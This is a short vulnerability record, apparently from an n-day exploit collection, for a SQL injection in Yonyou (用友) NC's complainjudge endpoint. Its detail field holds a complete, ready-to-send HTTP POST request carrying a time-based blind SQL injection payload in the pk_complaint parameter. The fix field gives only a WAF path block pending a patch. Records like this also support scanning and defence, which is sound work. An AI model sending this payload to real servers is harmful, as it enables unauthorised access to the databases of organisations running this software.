vendor = "用友"
name = "用友 NC complainjudge 接口 SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/ebvp/advorappcoll/complainjudge"
detail = "POST /ebvp/advorappcoll/complainjudge HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded pageId=login&pk_complaint=11%27;WAITFOR%20DELAY%20%270:0:5%27--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
